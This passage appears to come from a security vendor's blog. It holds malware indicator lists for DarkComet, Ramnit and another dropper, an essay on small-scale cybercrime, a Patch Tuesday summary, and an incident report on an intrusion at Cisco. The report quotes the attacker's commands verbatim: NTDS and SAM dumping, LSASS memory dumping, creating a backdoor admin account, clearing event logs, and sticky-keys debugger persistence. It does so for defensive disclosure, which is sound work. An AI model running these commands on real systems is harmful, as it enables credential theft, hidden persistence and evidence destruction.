<HKCU>\SOFTWARE\HIDBXWKK
Value Name: wudcreed
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: snwmmmvf
1
<HKCU>\SOFTWARE\TCUDAEVA
Value Name: dfvkflcs
1
<HKCU>\SOFTWARE\MNQGHNOP
Value Name: dlirvvqw
1
<HKCU>\SOFTWARE\MNFTGNBG
Value Name: csfqppjx
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: imcfhgpa
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: oqpeifcm
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: lhxptbjv
1
<HKCU>\SOFTWARE\HQMHIWJP
Value Name: durqeakc
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: hsrhcrvj
1
<HKCU>\SOFTWARE\CGOEUIAE
Value Name: htpvdufk
1
Mutexes Occurrences
2GVWNQJz1 26
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
173[.]203[.]97[.]13 15
76[.]74[.]184[.]127 13
37[.]59[.]82[.]218 13
94[.]32[.]67[.]214 13
212[.]45[.]17[.]15 13
142[.]4[.]60[.]242 13
50[.]57[.]139[.]41 12
82[.]150[.]199[.]140 12
92[.]240[.]232[.]232 10
113[.]53[.]247[.]147 10
203[.]157[.]142[.]2 9
176[.]31[.]181[.]76 9
188[.]165[.]192[.]116 7
Files and or directories created Occurrences
%LOCALAPPDATA%\<random, matching '[a-z]{8}'>.exe 26

File Hashes

01d6c50b70eb28d693e74b7ad15158707b8f57a9711e35c07d3d1c4ee7f630ee 08c25287e368a2158b029684e74626ba867a606837cce07ea2837b6ed78857a4 09bb26d956e0eb8aba714e836c041d844ac01eb4ccb3e498382c07ae3e267ff4 0bf1e31c2a0fe232876deef8bad8cbe1e08a3ad377db920ffc27c4852ef1dc89 0c6ec5510575da4416321eb58b20d3e447746e0cea1ffd06241f8a1e6bbb2837 0dd0361ead8f0e962be7a115dd8a4fa9d1a12b88c11633f82cfeae655a59f809 0fb3d456de4717b29c3a332e29a10cc9c52c94c92f6438f32791f5a5785b603b 1052ac160c67084f7dae6af5d9ee545fb0df20b99b8e989177ffb795a32aa35c 192d087160aad1afdb5ed06eb4128d997e578af554a626887746d91e66bc688a 1f4a448e60174255ef3d7492e60464ef4cfd84f65acb8c9824493b71d6864b8f 1f7810a638c2f1825276f2784cf557d7610ca0eabb463d06e6b25597fd077043 230a54a47fed1921adb452b5e88f1467e021dd85aac8f0d60a5a41912b991d28 26cad8fc0603c849db06f59e46b452bb4c3fe5cadfd46e344ce9a7f10365ddb8 276bb12ea62aa7f7ffce0531b84bbe1f7f2e6a19f4150ca6a7b1c69f4662b595 286bc1cee4c188350c8bb50812e30f7bec0b794efca5a2eb0b12368b479211b3 2938109eee69fe708fa15752e0723d110a01ee4e3e1e804cc97bbde01267fdb8 2a850531aeb725e5f138b9b1158640fe41c05a25560e2550fa2b070d96490a8e 31266599481409d70b317821d5af1aea693e7c1c7cedd04fd5dec0008bd816a7 384b51772d288e63038e146446e6e84b1f737cd3d8d34c3871d875fda77ff29a 38e1edffa779f9e2dd16104c35fc7a6c4a21dff7f3ad9bc8233b5817e8666441 3949d166ce5f75648fcb66ea3f9aaf251aa9847d576aef7d10b2830a295e2096 3ffee22fa7f00e260b92385c8cda56eee17c133b7c47cb33cf701d0c9e2ae89e 419c33660b59de42d150f8c1163873db94fa59e8d684bb44d0ec866eaebd00a7 441c34ba7b9ee2d7b0506013a2fb9fd5c5b517d38a66e1228edf4d7e1e20b9e8 446d8276a7008c24317b101c5d7050da5f1a51301a47842cd35f5d8a362eee83
*See JSON for more IOCs

Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

Secure Endpoint (image not included)

Secure Malware Analytics (image not included)

MITRE ATT&CK (image not included)


Win.Dropper.DarkComet-9959797-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 11 samples
Registry Keys Occurrences
<HKCU>\SOFTWARE\DC3_FEXEC 11
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM
Value Name: EnableLUA
11
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER
Value Name: AntiVirusDisableNotify
11
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON
Value Name: UserInit
11
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: MicroUpdate
11
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM 11
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: LanguageList
11
Mutexes Occurrences
DCPERSFWBP 11
DC_MUTEX-01SYFCM 11
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
zapto666[.]zapto[.]org 11
sildelanoe2[.]zapto[.]org 11
Files and or directories created Occurrences
%ProgramData%\Microsoft\Windows\Start Menu\Programs\MSDCSC 11
%ProgramData%\Microsoft\Windows\Start Menu\Programs\MSDCSC\msdcsc.exe 11

File Hashes

236c360d988e5b28b1a4eee229d0f3b5baa203043fc5ae8f016519f753e6b6bf 27990599b2e3ae192d5a897ed30cb98a20eae1d3ed8506dac8d82fef9ed9442e 53cd48d7d092d55fdc35966cfbd01861bf7304f9dc694237d322ff189adb32a4 55754ae53d9555a67d25be9cd73b5d85141d4ef43cd55ae2cf237be1cfa0d965 5dcd64134e33496cdd5ad13012b35834164d59d470a17359710a335469fdf35a 6e0d5bd7c55c9ec287377f8cadd342768c887a8901d015253996112442ff5d6f a53ebd4f480bdf3cf2199692af1d27c2864fc5c038fefed214688416cc2a1066 acaf2d6a74e24b2ab85338fa62efc85d76f6ec9c1cd11657230d975fd0dcde42 c4c677ab5115a0a568d1817528005ad24d0dc06ddd9d738d5f1fb75a3074b3f0 d2e83abd3d779b825e4088f53b43aa8521131a9ebd0dad8006e70fcc0e249e8d eea1adee202040b2c06dfb226eacd4c662b57714f44ffcc0561ff8cb2ec2a6d6

Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

Secure Endpoint (image not included)

Secure Malware Analytics (image not included)

MITRE ATT&CK (image not included)


Win.Dropper.Ramnit-9960101-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 15 samples
Registry Keys Occurrences
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM
Value Name: EnableLUA
15
<HKLM>\SYSTEM\CONTROLSET001\CONTROL\SAFEBOOT
Value Name: AlternateShell
15
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON
Value Name: Userinit
15
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: WlkSgauv
15
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MICORSOFT WINDOWS SERVICE
Value Name: Type
15
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MICORSOFT WINDOWS SERVICE
Value Name: ErrorControl
15
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MICORSOFT WINDOWS SERVICE
Value Name: ImagePath
15
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MICORSOFT WINDOWS SERVICE
Value Name: DisplayName
15
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MICORSOFT WINDOWS SERVICE
Value Name: WOW64
15
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MICORSOFT WINDOWS SERVICE
Value Name: DeleteFlag
15
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MICORSOFT WINDOWS SERVICE 15
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MICORSOFT WINDOWS SERVICE
Value Name: Start
15
Mutexes Occurrences
{79345B6A-421F-2958-EA08-07396ADB9E27} 15
{7934684F-421F-2958-EA08-07396ADB9E27} 15
{7934723B-421F-2958-EA08-07396ADB9E27} 15
{7934684E-421F-2958-EA08-07396ADB9E27} 15
{<random GUID>} 15
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
82[.]112[.]184[.]197 15
72[.]26[.]218[.]70 15
195[.]201[.]179[.]207 15
208[.]100[.]26[.]245 15
35[.]205[.]61[.]67 15
142[.]250[.]80[.]14 15
75[.]2[.]18[.]233 15
172[.]105[.]157[.]192 15
46[.]165[.]220[.]150 15
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
kbadlfpgtec[.]com 15
ymcwineqkj[.]com 15
tupexbvpmsc[.]com 15
mwsjitqbf[.]com 15
ccsnpnqxii[.]com 15
dpdadshi[.]com 15
eljmrnwualb[.]com 15
hjxrksvo[.]com 15
lfnjosunfd[.]com 15
paoxlrmbg[.]com 15
qekgxfrk[.]com 15
uhjwxipj[.]com 15
mkmngqxwk[.]com 15
ybmhumhymqj[.]com 15
qopdypfxhda[.]com 15
pfkilgedjhq[.]com 15
sgimiytkanu[.]com 15
leqnxekmi[.]com 15
ieugluxmlx[.]com 15
elieidkolpc[.]com 15
oluddrbaeb[.]com 15
skroackqs[.]com 15
pbfttfgw[.]com 15
ujypninrop[.]com 15
qpvvabbaqcn[.]com 15
*See JSON for more IOCs
Files and or directories created Occurrences
%LOCALAPPDATA%\wblmbpwi.log 15
%LOCALAPPDATA%\xrpatmbf.log 15
%LOCALAPPDATA%\ntqipnfr 15
%LOCALAPPDATA%\ntqipnfr\wlksgauv.exe 15
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\wlksgauv.exe 15
%TEMP%\dljcankv.sys 15
%TEMP%\oqinictcdtumygeo.exe 15
%LOCALAPPDATA%\ntqipnfr\px1F71.tmp 1
%LOCALAPPDATA%\ntqipnfr\px26AF.tmp 1
%LOCALAPPDATA%\ntqipnfr\px203A.tmp 1
%LOCALAPPDATA%\ntqipnfr\px1CC1.tmp 1
%LOCALAPPDATA%\ntqipnfr\px2B70.tmp 1
%LOCALAPPDATA%\ntqipnfr\px2BFD.tmp 1
%LOCALAPPDATA%\ntqipnfr\px1EB4.tmp 1
%LOCALAPPDATA%\ntqipnfr\px1B98.tmp 1
%LOCALAPPDATA%\ntqipnfr\px2365.tmp 1
%LOCALAPPDATA%\ntqipnfr\px2307.tmp 1
%LOCALAPPDATA%\ntqipnfr\px28A3.tmp 1
%LOCALAPPDATA%\ntqipnfr\px25C5.tmp 1
%LOCALAPPDATA%\ntqipnfr\px2DD1.tmp 1
%LOCALAPPDATA%\ntqipnfr\px2BED.tmp 1
%LOCALAPPDATA%\ntqipnfr\px2529.tmp 1

File Hashes

10df6ef7114ab16c25690d0183960e51d80488690e4f52680be2cf38d4aeb85b 1b39ecf9dc61b7e01c410b02eb8cb5c01ccdb1346474c62d7b916a9fb136681e 25354347217865d4e0a18080a942021de378cdcdff3633edc32583d892639569 265febc90d4163d2d1f29c0f07c8b003002ec7ee9ca4a3f8607ca5364cf06dc3 370c3bdde1b51bf0b9d079e644871b79848ac588c37ea7f89c94a2e2c3103642 3b955ab71c4147497bb1aa0fd65ee9b94bb1cbc897a0be46427f0f66a829de5d 55835f514e7ab6da28a6c69a3ffbe2d356b8ca987a274bc7a190689a57cbfbf2 615c3bfaa531cda8c1ac55bf9d5d93598617cd208702a7ce4c26cd94b2f2d4fd 61657d27b739df7dd856194cc29354ebf9d4a9abe3cb37d8782b5e6bddcba23c 7227840a73bce222d285d89cb1f528a5f5caf230af943a78f85f5e07136f1c4f 91cec64e347f7355c3dabb30b6e70c73d8a16890aa698ef526476930b998dd78 b70d31148f0b79548b7a2fd3a16228b32b0c52432b19b9d651fc9d6f9458c845 b7841d3db93f9a48887fdb82d3492b43f33f36ee8959e4f26a74c77962793e65 e80bad25222ffce33d1fa8c5962b235fecdce744b6dcf9c35db869844802573c ee4d65ec638095b28ec9c1290bf3edac8c767fb2a094c00925fabcde83dfb205

Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella This has coverage
WSA This has coverage

Screenshots of Detection

Secure Endpoint (image not included)

Secure Malware Analytics (image not included)

MITRE ATT&CK (image not included)


Small-time cybercrime is about to explode — We aren't ready

8 August 2022 at 12:42

The cybersecurity industry tends to focus on extremely large-scale or sophisticated, state-sponsored attacks. Rightfully so, as it can be the most interesting, technically speaking.

When most people think of cybercrime, they think of large-scale breaches because that's what dominates the headlines. However, the problem is much bigger. In 2021, the Internet Crime Complaint Center (IC3) received a staggering 847,376 complaints, with each victim losing a little more than $8,000 on average. Once you set aside the high-value breaches, the average loss per victim is even lower. The average person is far more likely to have their identity stolen or fall victim to some other sort of scam than be directly affected by a large-scale breach — and business is booming.

A deeper look at the data from IC3 shows that the number of complaints and the revenue being generated from cybercrime continue to rise. Interestingly, there was a huge jump in cybercrime during the pandemic, with a staggering increase of more than 60% in complaints between 2019 and 2020, and a further increase in 2021. It's clear that cybercrime is on the rise, but what's driving it?

There have been a variety of reports that criminals are turning increasingly to cybercrime instead of traditional drug crimes, with which they were commonly associated in the past. This is both a blessing and a curse — it removes a lot of violence and crime from the streets but is adding a significant amount of pressure on local law enforcement. This is an international problem. Several recent reports highlight that this is also an issue in Italy and Spain.

There are cybercriminals everywhere and the U.S. is no exception. What's changed is who is involved. Historically, cybercrime was considered white-collar criminal behavior perpetrated by those who were knowledgeable and turned bad. Now, technology has become such an integral part of our lives that anyone with a smartphone and the desire can get started in cybercrime. The growth of cryptocurrencies and their associated anonymity, whether legitimate or not, has garnered the attention of criminals who formerly operated in traditional criminal enterprises and who have now shifted to cybercrime and identity theft.

Cybercrime is a local law enforcement problem


For cybercrime to get the attention of national law enforcement, it needs to rise to a certain level. In most cases, that means the monetary value of the crimes. Effectively, a criminal needs to steal a lot of money to get the attention of the FBI or other national law enforcement agencies — and criminals know it. Most of the cybercrime that street criminals engage in doesn't garner the attention of national law enforcement, since it's much easier to cash out a small payday than a large lump sum. A criminal can walk into a big box store and buy a couple hundred dollars worth of gift cards using a stolen credit card relatively easily. Trying to cash out the $100,000 in Bitcoin they just stole in a scam is much more challenging.

The wave of cybercrime that's coming isn't going to be targeting huge multinational corporations looking for millions of dollars, it's going to scam folks out of their tax return or sign them up for fraudulent unemployment benefits. One thing that might become increasingly popular is the return of identity theft and associated credit card fraud. Ransomware cartels dominate the headlines with the tens or hundreds of millions of dollars they are taking in, but it's the low-level criminal compromising those around you that will be an urgent challenge in the months and years ahead.

Quantifying criminal activity presents challenges with interesting results


The IC3 data clearly shows that cybercrime is on the rise, but can it be correlated with a decrease in other forms of crime, or is it net-new bad actors? When initially looking at this topic, we were curious if there are trends pointing to reduced crime rates in some categories. The thought is that as more criminals move into cybercrime, we would see reductions in other types of crime. However, not all crime is created equal, and the challenge becomes, "How do you compare criminal behavior?" We started looking at the types of felonious crime that are commonly prosecuted in America and there were two big buckets of potential crossover criminals: violent crime and drug crime. We decided to focus specifically on felony drug crime since both drug and cybercrime tend to be non-violent offenders but wanted to include the violent crime landscape to see if there have been any noticeable shifts.

Being in a pandemic means we needed to look at a larger dataset extending beyond the pandemic, as some of the data could be skewed. Granular data on crime isn't widely available, but some of the larger police departments in the U.S. do publicly expose some of that data, most notably the New York Police Department. These larger cities are often considered a bellwether for the way the country as a whole will shift in the months and years ahead.

The NYPD breaks out data in a variety of categories, including various types of felonies. We focused specifically on the non-seven major felony offenses that included felonies for drugs and weapons. To avoid biased data from the pandemic, we began looking at the data beginning in 2013 and ending with the end of 2021, as the 2022 data is still being gathered. The resulting data paints a pretty clear picture of how crime has changed in the past eight years.

Clearly, the number of drug felonies over the past eight years has dropped off drastically before stabilizing during the pandemic. Interestingly, over the same period, the number of weapons-related felonies has stayed largely static, with small shifts from year to year. The question then becomes, "Did a large number of people decide to stop committing crime, or have criminals moved into different criminal ecosystems?"

It seems unlikely that we would see this significant drop-off in drug crime, especially as the percentage of people abusing drugs hasn't dropped significantly over the same period. It's important to note that shifts in cannabis laws may have affected the number of arrests, but cannabis wasn't fully legalized in New York state until March 2021.

Additionally, initial data indicates that some crimes including murder, assaults, robberies and grand larceny thefts are decreasing. Major cities in the U.S. reported decreases in said crimes between 30% and 42% following the implementation of stay-at-home orders due to COVID-19. Although the problem may have been exacerbated during the pandemic, it's been around a lot longer.

A recent Forbes article notes that this behavior is a trend that started about a decade ago but has since begun to accelerate. Street gangs are moving away from drugs and toward fraud fueled by cybercrime, in the U.S. and around the world. These criminals can operate in two different modes: either they actively gather the data themselves, which can require specific expertise in technology, hacking and malware, or they simply buy it. There are numerous forums where enterprising criminals can buy stolen data including names, addresses, Social Security numbers and other information required to commit fraud and identity theft. Then, the only remaining issue is monetizing it, and business is booming.

The fact that it is typically a smaller monetary crime makes it easier to accomplish. From a criminal's perspective, it's far easier and safer to take a stolen credit card and buy a $500 gift card from a big box store than it is to launder and process $10,000 stolen through similar means. The larger the denomination and the larger the scale, the more likely you are to draw the interest of federal law enforcement, who have far deeper pockets and much more sophisticated capabilities when it comes to prosecuting cybercrime. The pandemic has introduced additional avenues of fraud that criminal gangs have capitalized on, including COVID-19 relief funds and associated unemployment benefits fraud. In addition to the increases in available funds, the application processes were moved online to ensure the health of those involved, a boon for would-be criminals. Combining these with the already ongoing fraud and identity theft crime and the amount of money these groups are obtaining is significant.

Law enforcement challenges lie ahead


This brings us to the organizations tasked with bringing this new wave of cybercriminals to justice: law enforcement. However, since the majority of this crime is small time, the majority of the responsibility is going to fall on local law enforcement instead of state or federal agencies, which tend to cover more significant financial crimes. Unfortunately, that benefits the criminals in some ways. Local law enforcement faces many challenges daily, including drug and violent crime, for which they are highly trained. These types of arrests can be dangerous and require a very specific skill set.

Cybercrime, on the other hand, is a completely different type of problem to deal with. Instead of breaking down doors and dodging gunfire, law enforcement officers are poring over data from the criminals themselves and the organizations and people they target with their fraud, trying to tie together transactions to build a solid, forensically sound case.

The real challenge lies in how to effectively deal with these two problems that require completely different skills. This is the dilemma that local law enforcement departments face in the coming years. As we are all aware, information security professionals are highly sought after and can demand significant compensation, and training existing law enforcement officers on how to build cases of cybercrime can be challenging.

Law enforcement can take some cues from private industry here. One trend we are increasingly seeing to address the security talent shortage is to look elsewhere in your organization for those with a penchant for security and the investigative drive necessary to succeed. There are ample investigators inside police departments; look for those with skills in online investigations and leverage them for cybercrime work in the future.

Additionally, looking to the youth in your community could be another powerful resource for building a talent pipeline. Building relationships with existing computer science programs or high schools in the area to identify this talent could be a great resource. We're already seeing this applied around the world. For instance, in the UK, an investment of seven million pounds in a single year helped lead to the creation of cybercrime units in every police force in England and Wales.

There aren't any easy answers here, but the solution will likely require a shift in the way we handle policing in the future. As more criminals begin to hide behind keyboards and phones, away from the streets, traditional law enforcement is going to face challenges, and what may initially appear to be a reduction in certain types of crime may be accompanied by a similar spike in fraud and cybercrime that isn't as easy to quantify. The future of policing is going to require an increased ability to identify and prosecute more high-tech crime, while still maintaining control over potential drug and violence issues in the jurisdiction.

Conclusion


As we've seen repeatedly over the years, we don't typically see new types of crime, just crime taking new forms. The world today is run by technology, and it is becoming an ever-increasing part of our lives; as such, criminal activity is bound to increase. Criminals may seem like they are just out to commit crimes, but in reality, most criminals are choosing to live a life of crime to support themselves and their families. They, like anyone else, are familiar with risk assessment, and now it may make more sense to commit crime with a keyboard instead of selling drugs, as the risks are lower across the board. It's a lot less likely to draw an immediate law enforcement response, and there typically aren't turf wars in cyberspace; if there are, they tend to be less violent. Furthermore, the margins in cybercrime are significant, and in the end the goal is to make as much money as quickly as possible: technology is the key to scale and speed.

Law enforcement, especially at the local level, is going to need to evolve along with the criminals as they are tasked with protecting the general public. The future criminal is going to be aware of operational security and technologies like Tor to make their arrests increasingly difficult. The time is now to start building the capabilities into police departments to be able to handle the shift that has already been happening for a decade but is poised to explode, as people have been locked away for several years during the pandemic. The question becomes — how did criminals make use of that time?

Microsoft Patch Tuesday for August 2022 — Snort rules and prominent vulnerabilities

9 August 2022 at 20:44

By Jon Munshaw and Vanja Svajcer.

Microsoft released its monthly security update Tuesday, disclosing more than 120 vulnerabilities across its line of products and software, the most in a single Patch Tuesday in four months.  

This batch of updates also includes a fix for a new vulnerability in the Microsoft Windows Support Diagnostic Tool (MSDT) that’s actively being exploited in the wild, according to Microsoft. MSDT was already the target of the so-called “Follina” zero-day vulnerability in June.  

In all, August’s Patch Tuesday includes 15 critical vulnerabilities and a single low- and moderate-severity issue. The remainder is classified as “important.” 

Two of the important vulnerabilities CVE-2022-35743 and CVE-2022-34713 are remote code execution vulnerabilities in MSDT. However, only CVE-2022-34713 has been exploited in the wild and Microsoft considers it “more likely” to be exploited.

Microsoft Exchange Server contains two critical elevation of privilege vulnerabilities, CVE-2022-21980 and CVE-2022-24477. An attacker could exploit these vulnerabilities by tricking a target into visiting a malicious, attacker-hosted server or website. In addition to applying the patch released today, potentially affected users should enable Extended Protection on vulnerable versions of the server.

The Windows Point-to-Point Tunneling Protocol is also affected by three critical vulnerabilities. Two of them, CVE-2022-35744 and CVE-2022-30133, could allow an attacker to execute remote code on a RAS server. The other, CVE-2022-35747, could lead to a denial-of-service condition. CVE-2022-35744 has a CVSS severity score of 9.8 out of 10, one of the highest-rated vulnerabilities this month. An attacker could exploit these vulnerabilities by communicating via Port 1723. Affected users can render these issues unexploitable by blocking that port, though doing so risks disrupting other legitimate communications.

Another critical code execution vulnerability, CVE-2022-35804, affects the SMB Client and Server and the way the protocol handles specific requests. An attacker could exploit this on the SMB Client by configuring a malicious SMBv3 server and tricking a user into connecting to it through a phishing link. It could also be exploited in the Server by sending specially crafted packets to the server.  

Microsoft recommended that users block access to Port 445 to protect against the exploitation of CVE-2022-35804. However, only certain versions of Windows 11 are vulnerable to this issue. 

Talos would also like to highlight eight important vulnerabilities that Microsoft considers to be “more likely” to be exploited:  

A complete list of all the vulnerabilities Microsoft disclosed this month is available on its update page.

In response to these vulnerability disclosures, Talos is releasing a new Snort rule set that detects attempts to exploit some of them. Please note that additional rules may be released at a future date and current rules are subject to change pending additional information. Cisco Secure Firewall customers should use the latest update to their ruleset by updating their SRU. Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org. 

The rules included in this release that protect against the exploitation of many of these vulnerabilities are 60371 - 60380, 60382 - 60384, 60386 and 60387. There are also Snort 3 rules 300233 - 300239. 

Cisco Talos shares insights related to recent cyber attack on Cisco

10 August 2022 at 19:30

Update History


Date             Description of Updates
Aug. 10th 2022   Adding clarifying details on activity involving active directory.
Aug. 10th 2022   Update made to the Cisco Response and Recommendations section related to MFA.

Executive summary


  • On May 24, 2022, Cisco became aware of a potential compromise. Since that point, Cisco Security Incident Response (CSIRT) and Cisco Talos have been working to remediate. 
  • During the investigation, it was determined that a Cisco employee’s credentials were compromised after an attacker gained control of a personal Google account where credentials saved in the victim’s browser were being synchronized. 
  • The attacker conducted a series of sophisticated voice phishing attacks under the guise of various trusted organizations attempting to convince the victim to accept multi-factor authentication (MFA) push notifications initiated by the attacker. The attacker ultimately succeeded in achieving an MFA push acceptance, granting them access to VPN in the context of the targeted user. 
  • CSIRT and Talos are responding to the event and we have not identified any evidence suggesting that the attacker gained access to critical internal systems, such as those related to product development, code signing, etc. 
  • After obtaining initial access, the threat actor conducted a variety of activities to maintain access, minimize forensic artifacts, and increase their level of access to systems within the environment. 
  • The threat actor was successfully removed from the environment and displayed persistence, repeatedly attempting to regain access in the weeks following the attack; however, these attempts were unsuccessful. 
  • We assess with moderate to high confidence that this attack was conducted by an adversary that has been previously identified as an initial access broker (IAB) with ties to the UNC2447 cybercrime gang, Lapsus$ threat actor group, and Yanluowang ransomware operators. 
  • For further information see the Cisco Response page here.


Initial vector


Initial access to the Cisco VPN was achieved via the successful compromise of a Cisco employee’s personal Google account. The user had enabled password syncing via Google Chrome and had stored their Cisco credentials in their browser, enabling that information to synchronize to their Google account. After obtaining the user’s credentials, the attacker attempted to bypass multifactor authentication (MFA) using a variety of techniques, including voice phishing (aka "vishing") and MFA fatigue, the process of sending a high volume of push requests to the target’s mobile device until the user accepts, either accidentally or simply to attempt to silence the repeated push notifications they are receiving. Vishing is an increasingly common social engineering technique whereby attackers try to trick employees into divulging sensitive information over the phone. In this instance, an employee reported that they received multiple calls over several days in which the callers – who spoke in English with various international accents and dialects – purported to be associated with support organizations trusted by the user.  

Once the attacker had obtained initial access, they enrolled a series of new devices for MFA and authenticated successfully to the Cisco VPN. The attacker then escalated to administrative privileges, allowing them to log in to multiple systems, which alerted our Cisco Security Incident Response Team (CSIRT), who subsequently responded to the incident. The actor in question dropped a variety of tools, including remote access tools like LogMeIn and TeamViewer, offensive security tools such as Cobalt Strike, PowerSploit, Mimikatz, and Impacket, and added their own backdoor accounts and persistence mechanisms. 


Post-compromise TTPs


Following initial access to the environment, the threat actor conducted a variety of activities for the purposes of maintaining access, minimizing forensic artifacts, and increasing their level of access to systems within the environment. 

Once on a system, the threat actor began to enumerate the environment, using common built-in Windows utilities to identify the user and group membership configuration of the system, hostname, and identify the context of the user account under which they were operating. We periodically observed the attacker issuing commands containing typographical errors, indicating manual operator interaction was occurring within the environment. 

After establishing access to the VPN, the attacker then began to use the compromised user account to log on to a large number of systems before beginning to pivot further into the environment. They moved into the Citrix environment, compromising a series of Citrix servers and eventually obtained privileged access to domain controllers.  

After obtaining access to the domain controllers, the attacker began attempting to dump NTDS from them using “ntdsutil.exe” consistent with the following syntax:
powershell ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\users\public' q q 
They then worked to exfiltrate the dumped NTDS over SMB (TCP/445) from the domain controller to the VPN system under their control.

After obtaining access to credential databases, the attacker was observed leveraging machine accounts for privileged authentication and lateral movement across the environment. 

Consistent with activity we previously observed in other separate but similar attacks, the adversary created an administrative user called “z” on the system using the built-in Windows “net.exe” commands. This account was then added to the local Administrators group. We also observed instances where the threat actor changed the password of existing local user accounts to the same value shown below. Notably, we have observed the creation of the “z” account by this actor in previous engagements prior to the Russian invasion of Ukraine. 
C:\Windows\system32\net user z Lh199211* /add 
C:\Windows\system32\net localgroup administrators z /add
This account was then used in some cases to execute additional utilities, such as adfind or secretsdump, to attempt to enumerate the directory services environment and obtain additional credentials. Additionally, the threat actor was observed attempting to extract registry information, including the SAM database, on compromised Windows hosts.  
reg save hklm\system system 
reg save hklm\sam sam 
reg save HKLM\security sec
On some systems, the attacker was observed employing MiniDump from Mimikatz to dump LSASS. 
tasklist | findstr lsass 
rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump [LSASS_PID] C:\windows\temp\lsass.dmp full
The attacker also took steps to remove evidence of activities performed on compromised systems by deleting the previously created local Administrator account. They also used the “wevtutil.exe” utility to identify and clear event logs generated on the system. 
wevtutil.exe el 
wevtutil.exe cl [LOGNAME]
In many cases, we observed the attacker removing the previously created local administrator account.  
net user z /delete
To move files between systems within the environment, the threat actor often leveraged Remote Desktop Protocol (RDP) and Citrix. We observed them modifying the host-based firewall configurations to enable RDP access to systems. 
netsh advfirewall firewall set rule group=remote desktop new enable=Yes
We also observed the installation of additional remote access tools, such as TeamViewer and LogMeIn. 
C:\Windows\System32\msiexec.exe /i C:\Users\[USERNAME]\Pictures\LogMeIn.msi
The attacker frequently leveraged Windows logon bypass techniques to maintain the ability to access systems in the environment with elevated privileges. They frequently relied upon PSEXESVC.exe to remotely add the following Registry key values:  
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\narrator.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f 
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f
This enabled the attacker to leverage the accessibility features present on the Windows logon screen to spawn a SYSTEM level command prompt, granting them complete control of the systems. In several cases, we observed the attacker adding these keys but not further interacting with the system, possibly as a persistence mechanism to be used later as their primary privileged access is revoked.  

Throughout the attack, we observed attempts to exfiltrate information from the environment. We confirmed that the only successful data exfiltration that occurred during the attack included the contents of a Box folder that was associated with a compromised employee’s account and employee authentication data from active directory. The Box data obtained by the adversary in this case was not sensitive.  

In the weeks following the eviction of the attacker from the environment, we observed continuous attempts to re-establish access. In most cases, the attacker was observed targeting weak password rotation hygiene following mandated employee password resets. They primarily targeted users who they believed would have made single character changes to their previous passwords, attempting to leverage these credentials to authenticate and regain access to the Cisco VPN. The attacker was initially leveraging traffic anonymization services like Tor; however, after experiencing limited success, they switched to attempting to establish new VPN sessions from residential IP space using accounts previously compromised during the initial stages of the attack. We also observed the registration of several additional domains referencing the organization while responding to the attack and took action on them before they could be used for malicious purposes. 

After being successfully removed from the environment, the adversary also repeatedly attempted to establish email communications with executive members of the organization but did not make any specific threats or extortion demands. In one email, they included a screenshot showing the directory listing of the Box data that was previously exfiltrated as described earlier. Below is a screenshot of one of the received emails. The adversary redacted the directory listing screenshot prior to sending the email.



Backdoor analysis


